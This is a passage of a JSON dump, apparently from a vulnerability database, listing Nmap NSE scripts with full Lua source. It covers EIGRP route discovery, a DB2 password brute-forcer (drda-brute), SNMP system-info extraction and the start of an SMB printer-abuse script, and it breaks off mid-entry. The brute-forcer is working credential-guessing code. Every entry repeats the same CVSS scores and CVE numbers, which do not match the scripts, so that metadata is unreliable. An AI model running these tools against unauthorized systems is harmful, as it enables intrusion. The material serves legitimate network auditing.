stdnse.tohex(response)\n --else pull the InstanceNumber and move onto the pulling more information\n --\n else\n to_return = stdnse.output_table()\n -- set the nmap output for the port and version\n set_nmap(host, port)\n\n -- Vendor Number to Name lookup\n to_return[\"Vendor ID\"] = vendornum_query(sock)\n\n -- vendor name\n to_return[\"Vendor Name\"] = standard_query(sock, \"vendor\")\n\n -- Instance Number (object number)\n local instance = string.unpack(\">I3\", response, 20)\n to_return[\"Object-identifier\"] = instance\n\n --Firmware Verson\n to_return[\"Firmware\"] = standard_query(sock, \"firmware\")\n\n -- Application Software Version\n to_return[\"Application Software\"] = standard_query(sock, \"application\")\n\n -- Object Name\n to_return[\"Object Name\"] = standard_query(sock, \"object\")\n\n -- Model Name\n to_return[\"Model Name\"] = standard_query(sock, \"model\")\n\n -- Description\n to_return[\"Description\"] = standard_query(sock, \"description\")\n\n -- Location\n to_return[\"Location\"] = standard_query(sock, \"location\")\n\n end\n else\n -- return nothing, no BACNet was detected\n -- close socket\n sock:close()\n return nil\n end\n -- close socket\n sock:close()\n -- return all information that was found\n return to_return\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:04", "description": "Performs network discovery and routing information gathering through Cisco's Enhanced Interior Gateway Routing Protocol (EIGRP). \n\nThe script works by sending an EIGRP Hello packet with the specified Autonomous System value to the 224.0.0.10 multicast address and listening for EIGRP Update packets. The script then parses the update responses for routing information. \n\nIf no A.S value was provided by the user, the script will listen for multicast Hello packets to grab an A.S value. 
If no interface was provided as a script argument or through the -e option, the script will send packets and listen through all valid ethernet interfaces simultaneously.\n\n## Script Arguments \n\n#### broadcast-eigrp-discovery.kparams \n\nthe K metrics. Defaults to `101000`.\n\n#### broadcast-eigrp-discovery.as \n\nAutonomous System value to announce on. If not set, the script will listen for announcements on 224.0.0.10 to grab an A.S value.\n\n#### broadcast-eigrp-discovery.interface \n\nInterface to send on (overrides -e)\n\n#### broadcast-eigrp-discovery.timeout \n\nMax amount of time to listen for A.S announcements and updates. Defaults to `10` seconds.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=broadcast-eigrp-discovery <targets>\n nmap --script=broadcast-eigrp-discovery <targets> -e wlan0\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-eigrp-discovery:\n | 192.168.2.2\n | Interface: eth0\n | A.S: 1\n | Virtual Router ID: 0\n | Internal Route\n | Destination: 192.168.21.0/24\n | Next hop: 0.0.0.0\n | Internal Route\n | Destination: 192.168.31.0/24\n | Next hop: 0.0.0.0\n | External Route\n | Protocol: Static\n | Originating A.S: 0\n | Originating Router ID: 192.168.31.1\n | Destination: 192.168.60.0/24\n | Next hop: 0.0.0.0\n | External Route\n | Protocol: OSPF\n | Originating A.S: 1\n | Originating Router ID: 192.168.31.1\n | Destination: 192.168.24.0/24\n | Next hop: 0.0.0.0\n |_ Use the newtargets script-arg to add the results as targets\n \n\n## Requires \n\n * [eigrp](<../lib/eigrp.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [target](<../lib/target.html>)\n * [coroutine](<>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-15T01:50:47", "type": "nmap", "title": "broadcast-eigrp-discovery NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-08-29T03:06:40", "id": "NMAP:BROADCAST-EIGRP-DISCOVERY.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-eigrp-discovery.html", "sourceData": "local eigrp = require \"eigrp\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal target = require \"target\"\nlocal coroutine = require \"coroutine\"\nlocal string = require \"string\"\n\ndescription = [[\nPerforms network discovery and routing information gathering through\nCisco's Enhanced Interior Gateway Routing Protocol (EIGRP).\n\nThe script works by sending an EIGRP Hello packet with the specified Autonomous\nSystem value to the 224.0.0.10 multicast address and listening for EIGRP Update\npackets. The script then parses the update responses for routing information.\n\nIf no A.S value was provided by the user, the script will listen for multicast\nHello packets to grab an A.S value. 
If no interface was provided as a script\nargument or through the -e option, the script will send packets and listen\nthrough all valid ethernet interfaces simultaneously.\n\n]]\n\n---\n-- @usage\n-- nmap --script=broadcast-eigrp-discovery <targets>\n-- nmap --script=broadcast-eigrp-discovery <targets> -e wlan0\n--\n-- @args broadcast-eigrp-discovery.as Autonomous System value to announce on.\n-- If not set, the script will listen for announcements on 224.0.0.10 to grab\n-- an A.S value.\n--\n-- @args broadcast-eigrp-discovery.timeout Max amount of time to listen for A.S\n-- announcements and updates. Defaults to <code>10</code> seconds.\n--\n-- @args broadcast-eigrp-discovery.kparams the K metrics.\n-- Defaults to <code>101000</code>.\n-- @args broadcast-eigrp-discovery.interface Interface to send on (overrides -e)\n--\n--@output\n-- Pre-scan script results:\n-- | broadcast-eigrp-discovery:\n-- | 192.168.2.2\n-- | Interface: eth0\n-- | A.S: 1\n-- | Virtual Router ID: 0\n-- | Internal Route\n-- | Destination: 192.168.21.0/24\n-- | Next hop: 0.0.0.0\n-- | Internal Route\n-- | Destination: 192.168.31.0/24\n-- | Next hop: 0.0.0.0\n-- | External Route\n-- | Protocol: Static\n-- | Originating A.S: 0\n-- | Originating Router ID: 192.168.31.1\n-- | Destination: 192.168.60.0/24\n-- | Next hop: 0.0.0.0\n-- | External Route\n-- | Protocol: OSPF\n-- | Originating A.S: 1\n-- | Originating Router ID: 192.168.31.1\n-- | Destination: 192.168.24.0/24\n-- | Next hop: 0.0.0.0\n-- |_ Use the newtargets script-arg to add the results as targets\n--\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"broadcast\", \"safe\"}\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n\n-- Sends EIGRP raw 
packet to EIGRP multicast address.\n--@param interface Network interface to use.\n--@param eigrp_raw Raw eigrp packet.\nlocal eigrpSend = function(interface, eigrp_raw)\n local srcip = interface.address\n local dstip = \"224.0.0.10\"\n\n local ip_raw = stdnse.fromhex( \"45c00040ed780000015818bc0a00c8750a00c86b\") .. eigrp_raw\n local eigrp_packet = packet.Packet:new(ip_raw, ip_raw:len())\n eigrp_packet:ip_set_bin_src(ipOps.ip_to_str(srcip))\n eigrp_packet:ip_set_bin_dst(ipOps.ip_to_str(dstip))\n eigrp_packet:ip_set_len(#eigrp_packet.buf)\n eigrp_packet:ip_count_checksum()\n\n local sock = nmap.new_dnet()\n sock:ethernet_open(interface.device)\n -- Ethernet IPv4 multicast, our ethernet address and packet type IP\n local eth_hdr = stdnse.fromhex(\"01 00 5e 00 00 0a\") .. interface.mac .. stdnse.fromhex(\"08 00\")\n sock:ethernet_send(eth_hdr .. eigrp_packet.buf)\n sock:ethernet_close()\nend\n\n\n-- Listens for EIGRP updates\n--@param interface Network interface to listen on.\n--@param timeout Ammount of time to listen for.\n--@param responses Table to put valid responses into.\nlocal eigrpListener = function(interface, timeout, responses)\n local condvar = nmap.condvar(responses)\n local routers = {}\n local status, l3data, response, p, eigrp_raw, _\n local start = nmap.clock_ms()\n -- Filter for EIGRP packets that are sent either to us or to multicast\n local filter = \"ip proto 88 and (ip dst host \" .. interface.address .. 
\" or 224.0.0.10)\"\n local listener = nmap.new_socket()\n listener:set_timeout(500)\n listener:pcap_open(interface.device, 1024, true, filter)\n\n -- For each EIGRP packet captured until timeout\n while (nmap.clock_ms() - start) < timeout do\n response = {}\n response.tlvs = {}\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n eigrp_raw = string.sub(l3data, p.ip_hl*4 + 1)\n -- Check if it is an EIGRPv2 Update\n if eigrp_raw:byte(1) == 0x02 and eigrp_raw:byte(2) == 0x01 then\n -- Skip if did get the info from this router before\n if not routers[p.ip_src] then\n -- Parse header\n response = eigrp.EIGRP.parse(eigrp_raw)\n response.src = p.ip_src\n response.interface = interface.shortname\n end\n if response then\n -- See, if it has routing information\n for _,tlv in pairs(response.tlvs) do\n if eigrp.EIGRP.isRoutingTLV(tlv.type) then\n routers[p.ip_src] = true\n table.insert(responses, response)\n break\n end\n end\n end\n end\n end\n end\n condvar(\"signal\")\n return\nend\n\n-- Listens for EIGRP announcements to grab a valid Autonomous System value.\n--@param interface Network interface to listen on.\n--@param timeout Max amount of time to listen for.\n--@param astab Table to put result into.\nlocal asListener = function(interface, timeout, astab)\n local condvar = nmap.condvar(astab)\n local status, l3data, p, eigrp_raw, eigrp_hello, _\n local start = nmap.clock_ms()\n local filter = \"ip proto 88 and ip dst host 224.0.0.10\"\n local listener = nmap.new_socket()\n listener:set_timeout(500)\n listener:pcap_open(interface.device, 1024, true, filter)\n while (nmap.clock_ms() - start) < timeout do\n -- Check if another listener already found an A.S value.\n if #astab > 0 then break end\n\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n eigrp_raw = string.sub(l3data, p.ip_hl*4 + 1)\n -- Listen for EIGRPv2 Hello packets\n if eigrp_raw:byte(1) == 0x02 
and eigrp_raw:byte(2) == 0x05 then\n eigrp_hello = eigrp.EIGRP.parse(eigrp_raw)\n if eigrp_hello and eigrp_hello.as then\n table.insert(astab, eigrp_hello.as)\n break\n end\n end\n end\n end\n condvar(\"signal\")\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function()\n -- Get script arguments\n local as = stdnse.get_script_args(SCRIPT_NAME .. \".as\")\n local kparams = stdnse.get_script_args(SCRIPT_NAME .. \".kparams\") or \"101000\"\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n local interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n local output, responses, interfaces, lthreads = {}, {}, {}, {}\n local result, response, route, eigrp_hello, k\n local timeout = (timeout or 10) * 1000\n\n -- K params should be of length 6\n -- Cisco routers ignore eigrp packets that don't have matching K parameters\n if #kparams < 6 or #kparams > 6 then\n return fail(\"kparams should be of size 6.\")\n else\n k = {}\n k[1] = string.sub(kparams, 1,1)\n k[2] = string.sub(kparams, 2,2)\n k[3] = string.sub(kparams, 3,3)\n k[4] = string.sub(kparams, 4,4)\n k[5] = string.sub(kparams, 5,5)\n k[6] = string.sub(kparams, 6)\n end\n\n interface = interface or nmap.get_interface()\n if interface then\n -- If an interface was provided, get its information\n interface = nmap.get_interface_info(interface)\n if not interface then\n return fail((\"Failed to retrieve %s interface information.\"):format(interface))\n end\n interfaces = {interface}\n stdnse.debug1(\"Will use %s interface.\", interface.shortname)\n else\n local ifacelist = nmap.list_interfaces()\n for _, iface in ipairs(ifacelist) do\n -- Match all ethernet interfaces\n if iface.address and iface.link==\"ethernet\" and\n iface.address:match(\"%d+%.%d+%.%d+%.%d+\") then\n\n stdnse.debug1(\"Will use %s interface.\", iface.shortname)\n table.insert(interfaces, iface)\n end\n end\n end\n\n -- If user didn't provide an Autonomous 
System value, we listen fro multicast\n -- HELLO router announcements to get one.\n if not as then\n -- We use a table for condvar\n local astab = {}\n stdnse.debug1(\"No A.S value provided, will sniff for one.\")\n -- We should iterate over interfaces\n for _, interface in pairs(interfaces) do\n local co = stdnse.new_thread(asListener, interface, timeout, astab)\n lthreads[co] = true\n end\n local condvar = nmap.condvar(astab)\n -- Wait for the listening threads to finish\n repeat\n for thread in pairs(lthreads) do\n if coroutine.status(thread) == \"dead\" then lthreads[thread] = nil end\n end\n if ( next(lthreads) ) then\n condvar(\"wait\")\n end\n until next(lthreads) == nil;\n\n if #astab > 0 then\n stdnse.debug1(\"Will use %s A.S value.\", astab[1])\n as = astab[1]\n else\n return fail(\"Couldn't get an A.S value.\")\n end\n end\n\n -- Craft Hello packet\n eigrp_hello = eigrp.EIGRP:new(eigrp.OPCODE.HELLO, as)\n -- K params\n eigrp_hello:addTLV({ type = eigrp.TLV.PARAM, k = k, htime = 15})\n -- Software version\n eigrp_hello:addTLV({ type = eigrp.TLV.SWVER, majv = 12, minv = 4, majtlv = 1, mintlv = 2})\n\n -- On each interface, launch the listening thread and send the Hello packet.\n lthreads = {}\n for _, interface in pairs(interfaces) do\n local co = stdnse.new_thread(eigrpListener, interface, timeout, responses)\n -- We insert a small delay before sending the Hello so the listening\n -- thread doesn't miss updates.\n stdnse.sleep(0.5)\n lthreads[co] = true\n eigrpSend(interface, tostring(eigrp_hello))\n end\n\n local condvar = nmap.condvar(responses)\n -- Wait for the listening threads to finish\n repeat\n condvar(\"wait\")\n for thread in pairs(lthreads) do\n if coroutine.status(thread) == \"dead\" then lthreads[thread] = nil end\n end\n until next(lthreads) == nil;\n\n -- Output the useful info from the responses\n if #responses > 0 then\n for _, response in pairs(responses) do\n result = {}\n result.name = response.src\n if target.ALLOW_NEW_TARGETS then 
target.add(response.src) end\n table.insert(result, \"Interface: \" .. response.interface)\n table.insert(result, (\"A.S: %d\"):format(response.as))\n table.insert(result, (\"Virtual Router ID: %d\"):format(response.routerid))\n -- Output routes information TLVs\n for _, tlv in pairs(response.tlvs) do\n route = {}\n -- We are only interested in Internal or external routes\n if tlv.type == eigrp.TLV.EXT then\n route.name = \"External route\"\n for name, value in pairs(eigrp.EXT_PROTO) do\n if value == tlv.eproto then\n table.insert(route, (\"Protocol: %s\"):format(name))\n break\n end\n end\n table.insert(route, (\"Originating A.S: %s\"):format(tlv.oas))\n table.insert(route, (\"Originating Router ID: %s\"):format(tlv.orouterid))\n if target.ALLOW_NEW_TARGETS then target.add(tlv.orouterid) end\n table.insert(route, (\"Destination: %s/%d\"):format(tlv.dst, tlv.mask))\n table.insert(route, (\"Next hop: %s\"):format(tlv.nexth))\n table.insert(result, route)\n elseif tlv.type == eigrp.TLV.INT then\n route.name = \"Internal route\"\n table.insert(route, (\"Destination: %s/%d\"):format(tlv.dst, tlv.mask))\n table.insert(route, (\"Next hop: %s\"):format(tlv.nexth))\n table.insert(result, route)\n end\n end\n table.insert(output, result)\n end\n if #output>0 and not target.ALLOW_NEW_TARGETS then\n table.insert(output,\"Use the newtargets script-arg to add the results as targets\")\n end\n return stdnse.format_output(true, output)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:35", "description": "Performs password guessing against databases supporting the IBM DB2 protocol such as Informix, DB2 and Derby\n\n## Script Arguments \n\n#### drda-brute.threads \n\nthe amount of accounts to attempt to brute force in parallel (default 10).\n\n#### drda-brute.dbname \n\nthe database name against which to guess passwords (default `\"SAMPLE\"`).\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb 
\n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 50000 --script drda-brute <target>\n \n\n## Script Output \n \n \n 50000/tcp open drda\n | drda-brute:\n |_ db2admin:db2admin => Valid credentials\n\n## Requires \n\n * [coroutine](<>)\n * [drda](<../lib/drda.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [unpwdb](<../lib/unpwdb.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-14T08:28:56", "type": "nmap", "title": "drda-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DRDA-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/drda-brute.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal drda = require \"drda\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal unpwdb = 
require \"unpwdb\"\n\ndescription = [[\nPerforms password guessing against databases supporting the IBM DB2 protocol such as Informix, DB2 and Derby\n]]\n\n---\n-- @args drda-brute.threads the amount of accounts to attempt to brute\n-- force in parallel (default 10).\n-- @args drda-brute.dbname the database name against which to guess\n-- passwords (default <code>\"SAMPLE\"</code>).\n--\n-- @usage\n-- nmap -p 50000 --script drda-brute <target>\n--\n-- @output\n-- 50000/tcp open drda\n-- | drda-brute:\n-- |_ db2admin:db2admin => Valid credentials\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories={\"intrusive\", \"brute\"}\n\n\n-- Version 0.5\n-- Created 05/08/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 05/09/2010 - v0.2 - re-wrote as multi-threaded <patrik@cqure.net>\n-- Revised 05/10/2010 - v0.3 - revised parallelised design <patrik@cqure.net>\n-- Revised 08/14/2010 - v0.4 - renamed script and library from db2* to drda* <patrik@cqure.net>\n-- Revised 09/09/2011 - v0.5 - changed account status text to be more consistent with other *-brute scripts\n\nportrule = shortport.port_or_service({50000,60000}, {\"drda\",\"ibm-db2\"}, \"tcp\", {\"open\", \"open|filtered\"})\n\n--- Credential iterator\n--\n-- @param usernames iterator from unpwdb\n-- @param passwords iterator from unpwdb\n-- @return username string\n-- @return password string\nlocal function new_usrpwd_iterator (usernames, passwords)\n local function next_username_password ()\n for username in usernames do\n for password in passwords do\n coroutine.yield(username, password)\n end\n passwords(\"reset\")\n end\n while true do coroutine.yield(nil, nil) end\n end\n return coroutine.wrap(next_username_password)\nend\n\n--- Iterates over the password list and guesses passwords\n--\n-- @param host table with information as received by <code>action</code>\n-- @param port table with information as received by 
<code>action</code>\n-- @param database string containing the database name\n-- @param creds an iterator producing username, password pairs\n-- @param valid_accounts table in which to store found accounts\ndoLogin = function( host, port, database, creds, valid_accounts )\n local helper, status, response, passwords\n local condvar = nmap.condvar( valid_accounts )\n\n for username, password in creds do\n -- Checks if a password was already discovered for this account\n if ( nmap.registry.db2users == nil or nmap.registry.db2users[username] == nil ) then\n helper = drda.Helper:new()\n helper:connect( host, port )\n stdnse.debug1( \"Trying %s/%s against %s...\", username, password, host.ip )\n status, response = helper:login( database, username, password )\n helper:close()\n\n if ( status ) then\n -- Add credentials for future drda scripts to use\n if nmap.registry.db2users == nil then\n nmap.registry.db2users = {}\n end\n nmap.registry.db2users[username]=password\n table.insert( valid_accounts, string.format(\"%s:%s => Valid credentials\", username, password:len()>0 and password or \"<empty>\" ) )\n end\n end\n end\n condvar(\"broadcast\")\nend\n\n--- Checks if the supplied database exists\n--\n-- @param host table with information as received by <code>action</code>\n-- @param port table with information as received by <code>action</code>\n-- @param database string containing the database name\n-- @return status true on success, false on failure\nisValidDb = function( host, port, database )\n local status, response\n local helper = drda.Helper:new()\n\n helper:connect( host, port )\n -- Authenticate with a static probe account to see if the db is valid\n status, response = helper:login( database, \"dbnameprobe1234\", \"dbnameprobe1234\" )\n helper:close()\n\n if ( not(status) and response:match(\"Login failed\") ) then\n return true\n end\n return false\nend\n\n--- Returns the amount of currently active threads\n--\n-- @param threads table containing the list of 
threads\n-- @return count number containing the number of non-dead threads\nthreadCount = function( threads )\n local count = 0\n\n for thread in pairs(threads) do\n if ( coroutine.status(thread) == \"dead\" ) then\n threads[thread] = nil\n else\n count = count + 1\n end\n end\n return count\nend\n\naction = function( host, port )\n\n local result, response, status = {}, nil, nil\n local valid_accounts, threads = {}, {}\n local usernames, passwords, creds\n local database = stdnse.get_script_args('drda-brute.dbname') or \"SAMPLE\"\n local condvar = nmap.condvar( valid_accounts )\n local max_threads = tonumber( stdnse.get_script_args('drda-brute.threads') ) or 10\n\n -- Check if the DB specified is valid\n if( not(isValidDb(host, port, database)) ) then\n return (\"The databases %s was not found. (Use --script-args drda-brute.dbname=<dbname> to specify database)\"):format(database)\n end\n\n status, usernames = unpwdb.usernames()\n if ( not(status) ) then\n return \"Failed to load usernames\"\n end\n\n -- make sure we have a valid pw file\n status, passwords = unpwdb.passwords()\n if ( not(status) ) then\n return \"Failed to load passwords\"\n end\n\n creds = new_usrpwd_iterator( usernames, passwords )\n\n stdnse.debug1(\"Starting brute force with %d threads\", max_threads )\n\n for i=1,max_threads do\n local co = stdnse.new_thread( doLogin, host, port, database, creds, valid_accounts )\n threads[co] = true\n end\n\n -- wait for all threads to finish running\n while threadCount(threads)>0 do\n condvar(\"wait\")\n end\n\n return stdnse.format_output(true, valid_accounts)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:27", "description": "Attempts to extract system information from an SNMP service.\n\n## Script Arguments \n\n#### snmp.version \n\nSee the documentation for the [snmp](<../lib/snmp.html#script-args>) library. 
\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sU -p 161 --script snmp-sysdescr <target>\n \n\n## Script Output \n \n \n | snmp-sysdescr: HP ETHERNET MULTI-ENVIRONMENT,ROM A.25.80,JETDIRECT,JD117,EEPROM V.28.22,CIDATE 08/09/2006\n |_ System uptime: 28 days, 17:18:59 (248153900 timeticks)\n\n## Requires \n\n * [datetime](<../lib/datetime.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [snmp](<../lib/snmp.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "snmp-sysdescr NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-10-09T02:43:26", "id": "NMAP:SNMP-SYSDESCR.NSE", "href": "https://nmap.org/nsedoc/scripts/snmp-sysdescr.html", "sourceData": "local datetime = require \"datetime\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal snmp = require \"snmp\"\nlocal string = require \"string\"\n\ndescription = 
[[\nAttempts to extract system information from an SNMP service.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 161 --script snmp-sysdescr <target>\n--\n-- @output\n-- | snmp-sysdescr: HP ETHERNET MULTI-ENVIRONMENT,ROM A.25.80,JETDIRECT,JD117,EEPROM V.28.22,CIDATE 08/09/2006\n-- |_ System uptime: 28 days, 17:18:59 (248153900 timeticks)\n\nauthor = \"Thomas Buchanan\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\ndependencies = {\"snmp-brute\"}\n\n\nportrule = shortport.port_or_service(161, \"snmp\", \"udp\", {\"open\", \"open|filtered\"})\n\n---\n-- Sends SNMP packets to host and reads responses\naction = function(host, port)\n\n local snmpHelper = snmp.Helper:new(host, port)\n snmpHelper:connect()\n\n -- build a SNMP v1 packet\n -- copied from packet capture of snmpget exchange\n -- get value: 1.3.6.1.2.1.1.1.0 (SNMPv2-MIB::sysDescr.0)\n local status, response = snmpHelper:get({reqId=28428}, \"1.3.6.1.2.1.1.1.0\")\n\n if not status then\n return\n end\n\n -- since we got something back, the port is definitely open\n nmap.set_port_state(host, port, \"open\")\n\n local result = response and response[1] and response[1][1]\n\n -- build a SNMP v1 packet\n -- copied from packet capture of snmpget exchange\n -- get value: 1.3.6.1.2.1.1.3.0 (SNMPv2-MIB::sysUpTime.0)\n status, response = snmpHelper:get({reqId=28428}, \"1.3.6.1.2.1.1.3.0\")\n\n if not status then\n return result\n end\n\n local uptime = response and response[1] and response[1][1]\n if not uptime then\n return\n end\n\n result = result .. \"\\n\" .. string.format(\" System uptime: %s (%s timeticks)\", datetime.format_time(uptime, 100), tostring(uptime))\n\n return result\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:19", "description": "Attempts to print text on a shared printer by calling Print Spooler Service RPC functions. 
\n\nIn order to use the script, at least one printer needs to be shared over SMB. If no printer is specified, the script tries to enumerate existing ones by calling the LANMAN API, which might not always be available. LANMAN is available by default on Windows XP, but not on Vista or Windows 7 for example. In that case, you need to specify the printer share name manually using the `printer` script argument. You can find out available shares by using the smb-enum-shares script. \n\nLater versions of Windows require valid credentials by default, which you can specify through the smb library arguments `smbuser` and `smbpassword` or other options.\n\n## Script Arguments \n\n#### text \n\nText to print. Either text or filename needs to be specified.\n\n#### filename \n\nFile to read text from (ASCII only).\n\n#### printer \n\nPrinter share name. Optional; by default the script tries to enumerate available printer shares.\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 445 <target> --script=smb-print-text --script-args=\"text=0wn3d\"\n \n\n## Script Output \n \n \n |_smb-print-text: Printer job started using MyPrinter printer share.\n \n\n## Requires \n\n * [io](<>)\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [string](<>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-04T18:44:59", "type": "nmap", "title": "smb-print-text NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-06T14:20:33", "id": "NMAP:SMB-PRINT-TEXT.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-print-text.html", "sourceData": "local io = require \"io\"\nlocal msrpc = require 